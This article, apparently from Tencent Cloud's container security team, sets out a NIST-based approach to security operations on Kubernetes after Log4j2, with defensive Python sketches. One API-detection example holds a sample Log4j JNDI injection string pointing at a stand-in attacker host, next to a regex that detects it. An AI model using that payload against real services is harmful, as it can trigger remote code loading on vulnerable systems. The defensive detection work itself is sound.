Preface

In the previous article, we briefly analyzed how to respond quickly to and fix major security vulnerabilities under a cloud native architecture, along with the challenges and advantages that cloud native architecture brings to such security emergencies. With the incident behind us, we need to reflect on the lessons learned and think systematically about how to build and operate security effectively under a cloud native architecture, so that we can handle future security incidents with confidence.

TKE, Tencent Cloud's container service, currently runs the largest Kubernetes cluster in China, serving application scenarios that include games, payment, live streaming, and finance. The stable operation of the cluster depends on the protection provided by its security capabilities. TCSS, the Tencent Cloud container security service, tracks the industry's latest cloud native security developments, provides continuous guidance for TKE's security governance, and has accumulated a substantial body of thinking and best practices.

This article draws on our security construction and security operation practice to share, systematically, our thinking on both under a cloud native architecture.

Security construction and operation under cloud native architecture

Security operation is the goal, and security capability is the means. The two are closely related. Security capability building is the foundation of security operation, so better capabilities let operations run more smoothly. In turn, security operation provides better input and feedback to capability building, which makes detection and protection more accurate.

Security capability building and operation under a cloud native architecture is a very large topic that this article cannot cover completely. We focus on the typical scenario of the Log4j2 vulnerability and analyze, from the perspective of security operation, which security capabilities are required.

Traditional security capability building is essential

First, note that container security and cloud native security are both relatively narrow concepts: they usually cover only the detection and protection of security risks specific to cloud native architecture. We have always stressed that the security risks under a cloud native architecture are incremental, meaning that they add to existing risks rather than replace them. Overall security construction must therefore be a defense-in-depth system rather than a single product.

Examples include WAF, firewalls, and anti-DDoS protection at the ingress and egress of north-south traffic. If our cloud native platform is built on IaaS, then the VPC, and even hierarchical, domain-based network isolation and intrusion detection at the underlay level, form the foundation of cloud native security construction.

During the emergency response to the Log4j2 vulnerability, we also found that, even in a container environment, upgrading WAF rules and updating firewall outbound policies can provide a degree of mitigation and blocking right away.

In the Tencent Cloud Container Security White Paper released in November 2021, Tencent Cloud also proposed a layered container security framework. A very important part of it is basic security, which includes traditional data center security and the content covered by cloud security construction.

Security operation drives security capability building

For systematic security construction and operation, technical and standardization organizations have proposed standard frameworks that offer important guidance and reference. Here we take the cybersecurity framework proposed by NIST as the reference for our cloud native security construction.

Following the NIST Cybersecurity Framework, we divide cloud native security construction into five parallel and continuous steps: identification, protection, detection, response, and recovery.

Security identification

(1) Cluster asset identification

Security identification is mainly reflected in asset identification. Assets include Kubernetes resources such as Cluster, Node, Namespace, Pod, Service, and Container, as well as application assets such as image repositories and container images.

In a cloud native architecture, beyond a basic asset inventory, we also need to discover the logical relationships among these assets and between resources and businesses. That way, once a new vulnerability is found in an image or an intrusion is detected, the affected assets and personnel can be identified automatically, the impact range determined, and the person responsible for security located for quick disposal.
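The relationship between images, workloads, and owners can be sketched as a simple inventory lookup. This is only a minimal illustration under stated assumptions: the `Workload` record, its `owner` field, and the registry names are hypothetical and do not describe how TCSS or TKE store assets.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Workload:
    """One running Pod, reduced to the fields needed for impact analysis."""
    cluster: str
    namespace: str
    pod: str
    image: str   # image reference the Pod's container was started from
    owner: str   # hypothetical field: person responsible for security


def impact_of_image(inventory, vulnerable_image):
    """Return the workloads started from the given image, grouped by owner."""
    impacted = {}
    for workload in inventory:
        if workload.image == vulnerable_image:
            impacted.setdefault(workload.owner, []).append(workload)
    return impacted


# Hypothetical inventory, as an asset identification step might produce it.
inventory = [
    Workload("prod", "pay", "pay-api-0", "registry.example/pay-api:1.4", "alice"),
    Workload("prod", "pay", "pay-api-1", "registry.example/pay-api:1.4", "alice"),
    Workload("prod", "live", "stream-0", "registry.example/stream:2.0", "bob"),
]

hits = impact_of_image(inventory, "registry.example/pay-api:1.4")
for owner, workloads in hits.items():
    print(owner, [w.pod for w in workloads])
```

Grouping by owner reflects the operational goal stated above: the output is not just a list of affected Pods but a list of people to notify.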

(2) Self-built container identification

In addition to identifying standard cluster-level assets as described above, the capability must also adapt to relatively complex environments such as research and development (R&D) systems. In an R&D environment, for example, there are self-built assets alongside the standard cluster-level ones, such as a container that a user starts directly with a command like docker run.

(3) Business risk identification

From the perspective of security operation, security identification also covers business risk identification. Security risks need to be clearly defined for clusters and applications, and high-risk applications need higher-level security policies. For example, core business systems should have strict network isolation and access control mechanisms, and directly exposed services should have stricter permission control at the container level.

Security protection

With asset and business risk information, you need to rely on basic security capabilities to protect against known threats. The security protection here mainly includes two aspects:

(1) System hardening

• Configuration detection and repair

System hardening is an old topic, especially configuration checks and security configuration hardening, but it matters even more in cloud native architectures. By design, a container shares the kernel with the host operating system and gives container users more room to operate, so the security of the configuration largely determines the security of the entire system.

One of the main intrusion paths in a container environment is attacking containers through the host, for example through the Docker Remote API. Security capabilities therefore need to include comprehensive configuration checks.

Configuration hardening is an old problem, but fully implementing it in a cloud native environment is still complicated. It covers the hardening of basic platforms and components such as Kubernetes, Docker, and Istio, as well as the configuration of the application software inside images, which is harder still. We will not expand on it here.

From a security operation perspective, we need to be able to harden basic configurations based on the information obtained from configuration checks. At the same time, it is important to strike a balance between security configuration and stable running of services. On the one hand, security must be fully implemented, and on the other hand, service availability and stability must not be affected. In this case, you need to flexibly adjust configuration policies based on service features and security configuration requirements during configuration hardening. This is a continuous process of modification and improvement.

• Vulnerability detection and repair

Repairing known vulnerabilities is also an old topic, and it covers both host-level vulnerabilities and image vulnerabilities. For each detected vulnerability, whether to repair it and with what priority must be decided according to its threat level and how easily it can be exploited.
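One way to turn "threat level and ease of exploitation" into a repair order is a simple additive score. The sketch below is an assumption for illustration: the weights, the threshold, and the `Finding` fields are hypothetical, and the VULN-A, VULN-B, and VULN-C identifiers are placeholders. CVE-2021-44228 is the Log4j2 vulnerability discussed in this article.

```python
from dataclasses import dataclass


@dataclass
class Finding:
    vuln_id: str
    severity: float         # threat level on a 0-10 scale, e.g. a CVSS base score
    exploit_public: bool     # ease of exploitation: is a working exploit public?
    internet_exposed: bool   # is the affected workload directly exposed?


def priority(finding):
    """Combine threat level and exploitability into one score (weights are assumed)."""
    score = finding.severity
    if finding.exploit_public:
        score += 3
    if finding.internet_exposed:
        score += 2
    return score


def triage(findings, fix_threshold=9.0):
    """Return the findings worth fixing now, most urgent first."""
    ranked = sorted(findings, key=priority, reverse=True)
    return [f for f in ranked if priority(f) >= fix_threshold]


findings = [
    Finding("VULN-C", 5.0, True, False),
    Finding("VULN-B", 9.0, False, False),
    Finding("CVE-2021-44228", 10.0, True, True),
    Finding("VULN-A", 7.5, False, True),
]

for f in triage(findings):
    print(f.vuln_id, priority(f))
```

A real scoring model would likely also weigh the business risk level identified earlier. The point here is only that the decision can be made explicit and repeatable.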

• Image security assessment and repair

Container images, as the source of cloud native applications, need to be assessed along more dimensions than vulnerabilities alone. At a minimum, the assessment must include: detection of sensitive information in the image, to ensure that nothing sensitive is leaked; detection of viruses, Trojans, and other malicious files, mainly for public images of uncertain origin; and compliance checks on image builds, such as the difference between using COPY and ADD.
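Two of these checks, build compliance and sensitive information, can be illustrated with a very small Dockerfile linter. This is a hedged sketch rather than a real scanner: the secret pattern is a naive assumption, and the base image and file names are hypothetical. The COPY versus ADD rule rests on the fact that ADD also extracts local tar archives and can fetch remote URLs, while COPY only copies files.

```python
import re

# Naive, assumed pattern for secrets assigned in ENV/ARG instructions.
SECRET_PATTERN = re.compile(
    r"(password|secret|token|api[_-]?key)\s*=\s*\S+", re.IGNORECASE
)


def lint_dockerfile(text):
    """Return (line number, message) pairs for risky Dockerfile instructions."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and comments
        instruction = line.split(maxsplit=1)[0].upper()
        if instruction == "ADD":
            findings.append(
                (lineno, "prefer COPY unless archive extraction or URL fetch is needed")
            )
        if instruction in ("ENV", "ARG") and SECRET_PATTERN.search(line):
            findings.append((lineno, "possible secret baked into the image"))
    return findings


# Hypothetical Dockerfile used only for this illustration.
DOCKERFILE = "\n".join([
    "FROM registry.example/base:1.0",
    "ADD app.tar.gz /opt/app/",
    "ENV DB_PASSWORD=changeme",
    "COPY config.yaml /opt/app/",
])

for lineno, message in lint_dockerfile(DOCKERFILE):
    print(f"line {lineno}: {message}")
```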

In addition to detecting and repairing the risks mentioned above, security operation should also consider cleaning up zombie images, that is, images that are no longer used, both in the image repository and on cluster nodes. This plays an important role in reducing the attack surface.

Image assessment also needs to support custom inspection rules. Different organizations, users, and types of business have different security requirements for their images, so beyond a general set of assessment rules, users must be able to define their own. Combined with the business risk identification described above, this allows different security rules to be applied flexibly to different images.

• Risk management

In terms of operation management, the risk information mentioned above, such as configuration risks and vulnerabilities, needs a complete closed-loop risk management process to ensure that each risk is fully identified, repaired, and confirmed.
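The closed loop can be pictured as a small state machine in which a risk cannot be confirmed without passing through repair, and a failed re-check reopens it. The state names follow the three steps named above, while the transition table itself is an assumption made for illustration.

```python
# Allowed transitions between risk states (assumed for this sketch).
TRANSITIONS = {
    "identified": {"repaired"},
    "repaired": {"confirmed", "identified"},  # a failed re-check reopens the risk
    "confirmed": set(),                        # terminal state: the loop is closed
}


def advance(state, new_state):
    """Move a risk to new_state, rejecting transitions that skip a step."""
    if new_state not in TRANSITIONS[state]:
        raise ValueError(f"cannot move risk from {state!r} to {new_state!r}")
    return new_state


state = "identified"
state = advance(state, "repaired")
state = advance(state, "confirmed")
print(state)
```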

(2) Security defense

In addition to system hardening, you must use related defense capabilities and policies to prevent known intrusion risks at different levels during security defense.

• Access control

Access control here means admission gating: controlling and blocking cloud native applications at different stages of their full life cycle according to security requirements. It is a basic requirement of DevSecOps. Cloud native architecture, with its flexible resource management and automated application orchestration, makes this kind of security control convenient. The value of access control lies first in preventing security risks. In addition, after a major 0-day outbreak such as Log4j, access control can be used to quickly limit the affected scope and prevent additional risk.

From the perspective of the life cycle, access control needs to be implemented in both the development (Dev) and runtime (Ops) phases. Access control in the development phase mainly means detecting security risks such as vulnerabilities and sensitive information during CI and when images are pushed to the repository. An artifact can enter the next stage of the pipeline only after it meets the security requirements. The entry conditions here usually need to cover the various hardening items mentioned above.

Access control at runtime mainly applies to the deployment and running of applications. Only containers and Pods that meet the security requirements can be started and run. The entry conditions usually include checks on resource limits and on permission restrictions such as syscalls and capabilities.
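A runtime admission check of this kind can be sketched as a function over a Pod spec. The field names below (`resources.limits`, `securityContext.privileged`, `securityContext.capabilities.add`) follow the Kubernetes Pod specification, while the list of capabilities treated as dangerous and the sample Pod are assumptions made for this illustration.

```python
# Capabilities this sketch refuses to admit (an assumed, non-exhaustive list).
DANGEROUS_CAPS = {"SYS_ADMIN", "NET_ADMIN", "SYS_PTRACE", "SYS_MODULE"}


def admission_violations(pod):
    """Return the reasons a Pod spec should be rejected; empty means admit."""
    violations = []
    for container in pod.get("spec", {}).get("containers", []):
        name = container.get("name", "<unnamed>")

        # Resource restrictions: every container must declare CPU and memory limits.
        limits = container.get("resources", {}).get("limits", {})
        for resource in ("cpu", "memory"):
            if resource not in limits:
                violations.append(f"{name}: no {resource} limit")

        # Permission restrictions: no privileged mode, no dangerous capabilities.
        security = container.get("securityContext", {})
        if security.get("privileged", False):
            violations.append(f"{name}: privileged container")
        added = set(security.get("capabilities", {}).get("add", []))
        for cap in sorted(added & DANGEROUS_CAPS):
            violations.append(f"{name}: adds capability {cap}")
    return violations


# Hypothetical Pod spec that should be rejected.
pod = {
    "spec": {
        "containers": [{
            "name": "app",
            "resources": {"limits": {"cpu": "500m"}},
            "securityContext": {"capabilities": {"add": ["SYS_ADMIN"]}},
        }]
    }
}

for reason in admission_violations(pod):
    print(reason)
```

In a real cluster this logic would typically run inside an admission webhook or a policy engine. The sketch only shows the decision itself.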

Similarly, from an operational point of view, the standard default access control rules must be complemented by the ability to adjust and refine rules flexibly for each application.

• Runtime interception

Under a cloud native architecture, containers carry microservice applications, so in theory they should not need to execute high-privilege instructions. Access control already provides some prevention here. At runtime, we also need to intercept high-risk operations inside the container, such as high-risk commands and high-risk system calls, so that defense in depth is achieved across different dimensions.

• Network isolation

Lateral movement is what an attacker does after gaining an initial foothold, in what is also known as the post-exploitation stage. Cloud native networks usually provide no network isolation by default. You therefore need to define and implement a comprehensive network isolation mechanism that isolates different services from each other.

The network under a cloud native architecture is organized differently from a traditional network based on hosts or virtual machines. In Kubernetes, the smallest unit of the network is the Pod, which carries the business containers. Because Pods are created and destroyed frequently and their IP addresses change, traditional network policies based on IP addresses and ports no longer apply. We need to implement network isolation at different granularities based on resources such as labels and Services.
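Label-based isolation can be sketched as follows. The model is deliberately simplified and loosely mirrors the ingress semantics of a Kubernetes NetworkPolicy: a destination that no policy selects stays open, and a selected destination accepts traffic only from sources matching an allow rule. The policy dictionary layout (`target`, `allow_from`) and the label values are hypothetical.

```python
def matches(selector, labels):
    """True if every key/value pair in the selector is present in the labels."""
    return all(labels.get(key) == value for key, value in selector.items())


def is_allowed(policies, src_labels, dst_labels):
    """Decide whether traffic from a source Pod to a destination Pod is allowed."""
    selecting = [p for p in policies if matches(p["target"], dst_labels)]
    if not selecting:
        return True  # no policy selects the destination: not isolated
    return any(
        matches(allowed, src_labels)
        for policy in selecting
        for allowed in policy["allow_from"]
    )


# Hypothetical policy: only Pods labeled app=pay-api may reach the database Pods.
policies = [
    {"target": {"app": "db"}, "allow_from": [{"app": "pay-api"}]},
]

print(is_allowed(policies, {"app": "pay-api", "tier": "backend"}, {"app": "db"}))
print(is_allowed(policies, {"app": "stream"}, {"app": "db"}))
```

Because the rule refers to labels rather than addresses, it keeps working when Pods are rescheduled and receive new IP addresses.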

• Protection policy management

During operation, deciding how to set access control, runtime interception, network isolation, and other policies is a headache, because security administrators, operations administrators, and even developers all find it hard to say exactly how these rules should be configured to reach the most secure state.

This is one of the challenges of security operation under a cloud native architecture, yet the architecture itself also offers an advantage in addressing it. An important feature of cloud native architecture is immutable infrastructure. This means that, using methods such as allowlists and behavior models, we can automatically learn a security baseline from business characteristics and historical runtime data. That baseline then becomes an important reference for configuring the various protection policies.
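The allowlist flavor of baseline learning can be sketched in a few lines: count which processes each image has historically run, keep the ones seen often enough, and report anything outside that set. The event format, the `min_count` threshold, and the sample data are assumptions made for this illustration, and a production behavior model would be considerably richer.

```python
from collections import defaultdict


def learn_baseline(events, min_count=2):
    """Build a per-image allowlist of processes seen at least min_count times."""
    counts = defaultdict(lambda: defaultdict(int))
    for image, process in events:
        counts[image][process] += 1
    return {
        image: {proc for proc, seen in procs.items() if seen >= min_count}
        for image, procs in counts.items()
    }


def deviations(baseline, events):
    """Return the events whose process is not in the baseline for its image."""
    return [
        (image, process)
        for image, process in events
        if process not in baseline.get(image, set())
    ]


# Hypothetical history: the image normally runs only its Java process.
history = [("pay-api", "java")] * 3 + [("pay-api", "sh")]
baseline = learn_baseline(history)

live = [("pay-api", "java"), ("pay-api", "curl")]
print(deviations(baseline, live))
```

The approach leans on immutability: because containers from the same image are expected to behave the same way, a short learning window can produce a useful baseline.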

Security detection

Security is always a contest between offense and defense, and the defender is usually at a disadvantage. It is fair to say that no system is unbreakable.

Under a cloud native architecture, businesses are becoming more open and complex, and attackers' methods more diverse. The defense and interception measures described above can never cover every threat. Advanced targeted attacks and zero-day vulnerabilities such as Log4j2 can bypass the various defenses and turn into real security threats.

Therefore, even with all the defense and interception measures above in place, cloud native systems still need continuous runtime monitoring and security detection. Based on the characteristics of cloud native architecture, security detection is divided into two dimensions.

1) Threat detection in the system dimension

This mainly focuses on behavior inside containers, such as process anomaly detection, file anomaly detection, and user anomaly detection. Fine-grained anomaly detection of this kind can uncover attacks such as privilege escalation and cryptomining.

Threat detection in the network dimension. Although a strict access control strategy was set in the protection stage, lateral movement within the reachable network still poses a significant security threat. Network threat detection has two main aspects. The first takes the perspective of network behavior: flow-based anomaly detection on network traffic, especially east-west traffic, plays an important role in detecting port scanning, APT attacks, and even new or advanced network threats (NDR). The second takes the perspective of packets: analyzing anomalies in the packets exchanged between containers provides intrusion detection (NIDS) for the container network.
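As a small example of flow-based detection on east-west traffic, port scanning can be approximated by counting how many distinct destination ports one source touches on one destination. The flow tuple format, the addresses, and the `max_ports` threshold are assumptions for this sketch, and a real NDR system would also consider time windows and traffic volume.

```python
from collections import defaultdict


def port_scan_suspects(flows, max_ports=10):
    """Return (source, destination) pairs that touched more than max_ports ports."""
    ports = defaultdict(set)
    for src, dst, dst_port in flows:
        ports[(src, dst)].add(dst_port)
    return sorted(pair for pair, seen in ports.items() if len(seen) > max_ports)


# Hypothetical flow records: one Pod probes 50 ports, another makes normal calls.
flows = [("10.0.0.5", "10.0.0.9", port) for port in range(1, 51)]
flows += [("10.0.0.7", "10.0.0.9", 443)] * 20

print(port_scan_suspects(flows))
```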

2) Threat detection in the application dimension

Lateral movement in the post-exploitation stage is also a concern at the application level. The microservice architecture of cloud native applications means that network communication between containers consists largely of API calls, and ensuring that these calls are safe is of great significance to the security of cloud native applications. For example, from a compromised container an attacker can use an API to retrieve data from another service, or construct malicious parameters to attack an associated service. We therefore need API call anomaly detection in the application dimension, covering call behavior, call paths, call parameters, and so on.
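Call path and call parameter checks can be sketched together. The call record layout, the `known_edges` set, and the service names are hypothetical. The parameter check looks for the `${jndi:` lookup prefix associated with Log4j2 exploitation, and it is a naive pattern that obfuscated payloads would evade.

```python
import re

# Naive pattern for a JNDI lookup expression in a parameter value.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def suspicious_params(call):
    """Return the names of parameters whose values contain a JNDI lookup."""
    return sorted(
        name
        for name, value in call["params"].items()
        if JNDI_LOOKUP.search(str(value))
    )


def check_call(call, known_edges):
    """Return the reasons an API call looks anomalous; empty means normal."""
    reasons = []
    if (call["caller"], call["callee"]) not in known_edges:
        reasons.append("unexpected call path")
    for name in suspicious_params(call):
        reasons.append(f"suspicious parameter {name}")
    return reasons


# Hypothetical service graph: only the gateway is expected to call the order service.
known_edges = {("gateway", "order")}

call = {
    "caller": "report",
    "callee": "order",
    "params": {"user": "${jndi:ldap://attacker.example/a}", "page": 1},
}
print(check_call(call, known_edges))
```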

Security response

Security response refers to the measures taken to handle the alarms raised by security detection in the previous step. For security response under a cloud native architecture, especially at the network level, we tend to use out-of-band (bypass) detection followed by response and disposal, rather than placing devices such as IPS or WAF inline in the traffic path as traditional network security does. This design is chosen mainly for the sake of business performance.

The response to threats mainly includes two aspects:

(1) Disposal

You can handle alarms by isolating the network, suspending the container, stopping abnormal processes, or destroying the container. One prerequisite is that, because containers have short life cycles, comprehensive logging and tracing must be built in while the security capabilities are being constructed, so that source tracing and forensics remain possible after disposal.

During disposal, for anomalies that are clearly malicious, the operation can be automated through one-click blocking and one-click isolation to reduce operating costs.
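The split between automated and manual disposal can be sketched as a lookup plus a confidence gate. The alert types, the action names, and the `min_confidence` value are all hypothetical and serve only to show the decision shape.

```python
# Alert types considered deterministic enough to dispose of automatically (assumed).
AUTO_ACTIONS = {
    "cryptominer_process": "stop_process",
    "reverse_shell": "isolate_network",
}


def plan_disposal(alert, min_confidence=0.9):
    """Choose an automatic action for clear-cut alerts, else route to manual review."""
    action = AUTO_ACTIONS.get(alert["type"])
    if action is not None and alert["confidence"] >= min_confidence:
        return {"action": action, "target": alert["container"], "mode": "automatic"}
    return {"action": "review", "target": alert["container"], "mode": "manual"}


alert = {"type": "reverse_shell", "confidence": 0.97, "container": "pay-api-0"}
print(plan_disposal(alert))
```

Anything that falls through to manual review can still be handled with one click by an operator. The gate only decides whether a human needs to look first.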

(2) Traceability

By correlating the alarm, log, and tracing data of containers, you can trace the source of an alarm, reconstruct the attack chain, and determine the cause of the intrusion.

Security recovery

The security recovery stage has two aspects. The first is to repair and harden against the related risks according to the cause of the intrusion. The second is to update the security policies for hardening, protection, detection, and the other steps, so that operation feeds back into capability building.

Conclusion

More than a month has passed since the Log4j2 vulnerability was disclosed, and I believe most of the affected systems have been patched. This sudden emergency should prompt us to rethink security construction and security operation under a cloud native architecture. A vulnerability or breach is hard to predict, and we do not know when the next one will come.

I hope this article can bring some ideas and help to the construction of cloud native security. If you have any suggestions or questions, please leave a message at the end of this article.
